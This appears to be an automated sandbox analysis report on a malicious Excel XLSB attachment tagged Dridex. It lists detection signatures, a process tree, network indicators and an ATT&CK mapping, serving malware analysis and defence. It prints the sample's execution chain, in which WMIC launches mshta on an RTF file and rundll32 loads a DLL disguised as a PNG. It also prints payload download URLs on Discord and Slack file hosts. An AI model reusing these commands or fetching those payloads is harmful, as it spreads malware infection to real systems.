Play interactive tour

Edit tour

Windows Analysis Report Amendment.-0428767170_20210922.xlsb

Overview

General Information

Sample Name:	Amendment.-0428767170_20210922.xlsb
Analysis ID:	488098
MD5:	19989ff08d6e0accb9d233f5477bb216
SHA1:	a7b9f2c08fceca215ab866f59269d416bc8f8f09
SHA256:	91164696edc4efba635e5246a48693e8fd75db2eef8e06e354848365b9fead55
Tags:	22201Dridexxlsbxlsx
Infos:
Most interesting Screenshot:

Detection

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Sigma detected: Execute DLL with spoofed extension

Creates and opens a fake document (probably a fake document to hide exploiting)

Sigma detected: Suspicious WMI Execution Using Rundll32

Sigma detected: Microsoft Office Product Spawning Windows Shell

Document exploit detected (process start blacklist hit)

Creates processes via WMI

Contains functionality to create processes via WMI

Queries the volume information (name, serial number etc) of a device

Potential document exploit detected (unknown TCP traffic)

Searches for the Microsoft Outlook file path

May sleep (evasive loops) to hinder dynamic analysis

Yara detected Xls With Macro 4.0

Sigma detected: Suspicious WMI Execution

Creates a window with clipboard capturing capabilities

Stores large binary data to the registry

JA3 SSL client fingerprint seen in connection with other malware

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Creates a process in suspended mode (likely to inject code)

IP address seen in connection with other malware

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 1664 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

WMIC.exe (PID: 2580 cmdline: wmic process call create 'mshta C:\ProgramData\gvREyChXMcc.rtf' MD5: FD902835DEAEF4091799287736F3A028)

mshta.exe (PID: 2608 cmdline: mshta C:\ProgramData\gvREyChXMcc.rtf MD5: 95828D670CFD3B16EE188168E083C3C5)

mshta.exe (PID: 2540 cmdline: mshta C:\\ProgramData\defdoc.rtf MD5: 95828D670CFD3B16EE188168E083C3C5)

WMIC.exe (PID: 1724 cmdline: wmic process call create 'rundll32.exe C:\\ProgramData\defdoc.png FilterCreate' MD5: FD902835DEAEF4091799287736F3A028)

rundll32.exe (PID: 2396 cmdline: rundll32.exe C:\\ProgramData\defdoc.png FilterCreate MD5: DD81D91FF3B0763C392422865C9AC12E)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
app.xml	JoeSecurity_XlsWithMacro4	Yara detected Xls With Macro 4.0	Joe Security

Sigma Overview

System Summary:

Sigma detected: Suspicious WMI Execution Using Rundll32

Show sources

Source: Process started

Author: Florian Roth: Data: Command: wmic process call create 'rundll32.exe C:\\ProgramData\defdoc.png FilterCreate', CommandLine: wmic process call create 'rundll32.exe C:\\ProgramData\defdoc.png FilterCreate', CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: mshta C:\\ProgramData\defdoc.rtf, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2540, ProcessCommandLine: wmic process call create 'rundll32.exe C:\\ProgramData\defdoc.png FilterCreate', ProcessId: 1724

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: wmic process call create 'mshta C:\ProgramData\gvREyChXMcc.rtf', CommandLine: wmic process call create 'mshta C:\ProgramData\gvREyChXMcc.rtf', CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1664, ProcessCommandLine: wmic process call create 'mshta C:\ProgramData\gvREyChXMcc.rtf', ProcessId: 2580

Sigma detected: Suspicious WMI Execution

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, juju4, oscd.community: Data: Command: wmic process call create 'mshta C:\ProgramData\gvREyChXMcc.rtf', CommandLine: wmic process call create 'mshta C:\ProgramData\gvREyChXMcc.rtf', CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1664, ProcessCommandLine: wmic process call create 'mshta C:\ProgramData\gvREyChXMcc.rtf', ProcessId: 2580

Data Obfuscation:

Sigma detected: Execute DLL with spoofed extension

Show sources

Source: Process started

Author: Joe Security: Data: Command: wmic process call create 'rundll32.exe C:\\ProgramData\defdoc.png FilterCreate', CommandLine: wmic process call create 'rundll32.exe C:\\ProgramData\defdoc.png FilterCreate', CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: mshta C:\\ProgramData\defdoc.rtf, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2540, ProcessCommandLine: wmic process call create 'rundll32.exe C:\\ProgramData\defdoc.png FilterCreate', ProcessId: 1724

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.22:49167 version: TLS 1.2

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\wbem\WMIC.exe

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 162.159.135.233:443

Source: global traffic

DNS query: name: cdn.discordapp.com

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 162.159.135.233:443

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: Joe Sandbox View	IP Address: 162.159.135.233 162.159.135.233
Source: Joe Sandbox View	IP Address: 162.159.135.233 162.159.135.233

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443

Source: mshta.exe, 00000004.00000002.705189005.000000000458C000.00000004.00000001.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000004.00000002.703755437.0000000003030000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.703478430.0000000003B40000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.458672312.0000000001BE0000.00000002.00020000.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: mshta.exe, 00000004.00000002.705189005.000000000458C000.00000004.00000001.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000004.00000002.705756173.0000000004610000.00000004.00000001.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: mshta.exe, 00000004.00000002.705756173.0000000004610000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: mshta.exe, 00000004.00000002.705756173.0000000004610000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: mshta.exe, 00000004.00000002.705756173.0000000004610000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: mshta.exe, 00000004.00000002.705871105.0000000004638000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: mshta.exe, 00000004.00000002.705756173.0000000004610000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: mshta.exe, 00000004.00000002.705756173.0000000004610000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: mshta.exe, 00000004.00000002.703755437.0000000003030000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.703478430.0000000003B40000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.458672312.0000000001BE0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: mshta.exe, 00000004.00000002.703755437.0000000003030000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.703478430.0000000003B40000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.458672312.0000000001BE0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: mshta.exe, 00000004.00000002.703943748.0000000003217000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.703886169.0000000003D27000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.458877846.0000000001DC7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: mshta.exe, 00000004.00000002.703943748.0000000003217000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.703886169.0000000003D27000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.458877846.0000000001DC7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: mshta.exe, 00000004.00000002.705756173.0000000004610000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: mshta.exe, 00000004.00000002.705756173.0000000004610000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: mshta.exe, 00000004.00000002.705756173.0000000004610000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: mshta.exe, 00000004.00000002.705756173.0000000004610000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: mshta.exe, 00000004.00000002.705756173.0000000004610000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: mshta.exe, 00000004.00000002.705756173.0000000004610000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: mshta.exe, 00000004.00000002.705756173.0000000004610000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: mshta.exe, 00000004.00000002.704140330.0000000003410000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.704087374.0000000003F20000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: WMIC.exe, 00000002.00000002.445898420.0000000001B20000.00000002.00020000.sdmp, WMIC.exe, 00000007.00000002.453998657.0000000001BE0000.00000002.00020000.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: mshta.exe, 00000004.00000002.703943748.0000000003217000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.703886169.0000000003D27000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.458877846.0000000001DC7000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: mshta.exe, 00000004.00000002.703943748.0000000003217000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.703886169.0000000003D27000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.458877846.0000000001DC7000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: mshta.exe, 00000004.00000002.704140330.0000000003410000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.704087374.0000000003F20000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: mshta.exe, 00000004.00000002.705756173.0000000004610000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: mshta.exe, 00000004.00000002.705756173.0000000004610000.00000004.00000001.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: mshta.exe, 00000004.00000002.703755437.0000000003030000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.703478430.0000000003B40000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.458672312.0000000001BE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: mshta.exe, 00000004.00000002.703943748.0000000003217000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.703886169.0000000003D27000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.458877846.0000000001DC7000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: mshta.exe, 00000004.00000002.703755437.0000000003030000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.703478430.0000000003B40000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.458672312.0000000001BE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000009.00000002.458672312.0000000001BE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: mshta.exe, 00000004.00000002.702282644.0000000000472000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.di
Source: mshta.exe, 00000004.00000002.705522984.00000000045CF000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/
Source: mshta.exe, 00000004.00000003.445755891.0000000000481000.00000004.00000001.sdmp, mshta.exe, 00000004.00000002.702282644.0000000000472000.00000004.00000001.sdmp, mshta.exe, 00000004.00000002.702205557.00000000003FC000.00000004.00000020.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/890212086519566369/890212251435425862/0_system.componentmodel
Source: mshta.exe, 00000004.00000003.445755891.0000000000481000.00000004.00000001.sdmp, mshta.exe, 00000004.00000002.702282644.0000000000472000.00000004.00000001.sdmp, mshta.exe, 00000004.00000002.702083806.000000000038D000.00000004.00000020.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/890212086519566369/890212261132636200/5_samsrv.dll.dll
Source: mshta.exe, 00000004.00000002.702083806.000000000038D000.00000004.00000020.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/890212086519566369/890212261132636200/5_samsrv.dll.dllgfhG28
Source: mshta.exe, 00000004.00000002.702083806.000000000038D000.00000004.00000020.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/890212086519566369/890212261132636200/5_samsrv.dll.dllhCvNhM
Source: mshta.exe, 00000004.00000002.702108672.00000000003B0000.00000004.00000020.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/890212086519566369/890212261132636200/5_samsrv.dll.dllievKp
Source: mshta.exe, 00000004.00000003.445755891.0000000000481000.00000004.00000001.sdmp, mshta.exe, 00000004.00000003.445778489.000000000047B000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/890212591471824921/890212677559922708/9_dispex.dll.dll
Source: mshta.exe, 00000004.00000002.702130529.00000000003BB000.00000004.00000020.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/890212591471824921/890212677559922708/9_dispex.dll.dll=
Source: mshta.exe, 00000004.00000003.445755891.0000000000481000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/890212591471824921/890212677559922708/9_dispex.dll.dllh
Source: mshta.exe, 00000004.00000003.445755891.0000000000481000.00000004.00000001.sdmp, mshta.exe, 00000004.00000002.702083806.000000000038D000.00000004.00000020.sdmp, mshta.exe, 00000004.00000003.445778489.000000000047B000.00000004.00000001.sdmp	String found in binary or memory: https://files.slack.com/files-pri/T02EHM1BB19-F02FFGMT84C/download/6_hpzstw72?pub_secret=009a86b011
Source: mshta.exe, 00000004.00000003.445755891.0000000000481000.00000004.00000001.sdmp, mshta.exe, 00000004.00000003.445778489.000000000047B000.00000004.00000001.sdmp	String found in binary or memory: https://files.slack.com/files-pri/T02ERNYLC69-F02F9AG9CEN/download/6_hpzstw72?pub_secret=356a094b3b
Source: mshta.exe, 00000004.00000002.702044962.000000000035E000.00000004.00000020.sdmp	String found in binary or memory: https://files.slack.com/files-pri/T02ERNYLC69-F02F9AG9CEN/download/6_hpzstw72?pub_secret=356a094b3bm
Source: mshta.exe, 00000004.00000003.445755891.0000000000481000.00000004.00000001.sdmp, mshta.exe, 00000004.00000003.445778489.000000000047B000.00000004.00000001.sdmp, mshta.exe, 00000004.00000002.702108672.00000000003B0000.00000004.00000020.sdmp	String found in binary or memory: https://files.slack.com/files-pri/T02F79UM6TT-F02F9AE9ZJ6/download/3_SmiEngine?pub_secret=4e9eeb9360
Source: mshta.exe, 00000004.00000002.705756173.0000000004610000.00000004.00000001.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: mshta.exe, 00000004.00000002.704938786.0000000004325000.00000004.00000040.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error
Source: mshta.exe, 00000004.00000002.706306833.0000000004D7B000.00000004.00000040.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DC3E021B.png

Jump to behavior

Source: unknown

DNS traffic detected: queries for: cdn.discordapp.com

Source: global traffic

HTTP traffic detected: GET /attachments/890212086519566369/890212261132636200/5_samsrv.dll.dll HTTP/1.1Accept: */*User-Agent: xFmKaIMAccept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateHost: cdn.discordapp.comConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.22:49167 version: TLS 1.2

Source: C:\Windows\System32\mshta.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior
Source: C:\Windows\System32\mshta.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior

System Summary:

Contains functionality to create processes via WMI

Show sources

Source: WMIC.exe, 00000002.00000002.445716257.0000000000200000.00000004.00000020.sdmp

Binary or memory string: C:\Users\user\Documents\C:\Windows\System32\Wbem;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\System32\Wbem\wmic.exewmic process call create 'mshta C:\ProgramData\gvREyChXMcc.rtf'C:\Windows\System32\Wbem\wmic.exeWinSta0\Default

Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE			Jump to behavior
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE			Jump to behavior

Source: C:\Windows\System32\wbem\WMIC.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\\ProgramData\defdoc.png FilterCreate

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\wbem\WMIC.exe wmic process call create 'mshta C:\ProgramData\gvREyChXMcc.rtf'
Source: unknown	Process created: C:\Windows\System32\mshta.exe mshta C:\ProgramData\gvREyChXMcc.rtf
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\mshta.exe mshta C:\\ProgramData\defdoc.rtf
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic process call create 'rundll32.exe C:\\ProgramData\defdoc.png FilterCreate'
Source: unknown	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\\ProgramData\defdoc.png FilterCreate
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\wbem\WMIC.exe wmic process call create 'mshta C:\ProgramData\gvREyChXMcc.rtf'	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\mshta.exe mshta C:\\ProgramData\defdoc.rtf	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic process call create 'rundll32.exe C:\\ProgramData\defdoc.png FilterCreate'	Jump to behavior

Source: C:\Windows\System32\wbem\WMIC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Source: mshta.exe, 00000004.00000002.703755437.0000000003030000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.703478430.0000000003B40000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.458672312.0000000001BE0000.00000002.00020000.sdmp

Binary or memory string: .VBPud<_

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Amendment.-0428767170_20210922.xlsb

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVREA1F.tmp

Jump to behavior

Source: classification engine

Classification label: mal72.expl.evad.winXLSB@9/12@1/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Amendment.-0428767170_20210922.xlsb	Initial sample: OLE zip file path = xl/media/image1.png
Source: Amendment.-0428767170_20210922.xlsb	Initial sample: OLE zip file path = docProps/custom.xml

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Data Obfuscation:

Persistence and Installation Behavior:

Creates processes via WMI

Show sources

Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Hooking and other Techniques for Hiding and Protection:

Creates and opens a fake document (probably a fake document to hide exploiting)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: cmd line: gvreychxmcc.rtf	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: cmd line: defdoc.rtf	Jump to behavior
Source: unknown	Process created: cmd line: gvreychxmcc.rtf

Source: C:\Windows\System32\mshta.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\wbem\WMIC.exe TID: 1016	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\mshta.exe TID: 2216	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\mshta.exe TID: 2616	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe TID: 2724	Thread sleep time: -180000s >= -30000s	Jump to behavior

Source: Yara match

File source: app.xml, type: SAMPLE

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\mshta.exe mshta C:\\ProgramData\defdoc.rtf			Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic process call create 'rundll32.exe C:\\ProgramData\defdoc.png FilterCreate'			Jump to behavior

Source: mshta.exe, 00000004.00000002.702488660.0000000000920000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.702396354.0000000001460000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: mshta.exe, 00000004.00000002.702488660.0000000000920000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.702396354.0000000001460000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: mshta.exe, 00000004.00000002.702488660.0000000000920000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.702396354.0000000001460000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation			Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation			Jump to behavior

Source: C:\Windows\System32\wbem\WMIC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation21	Path Interception	Process Injection12	Masquerading1	OS Credential Dumping	Virtualization/Sandbox Evasion1	Remote Services	Email Collection1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
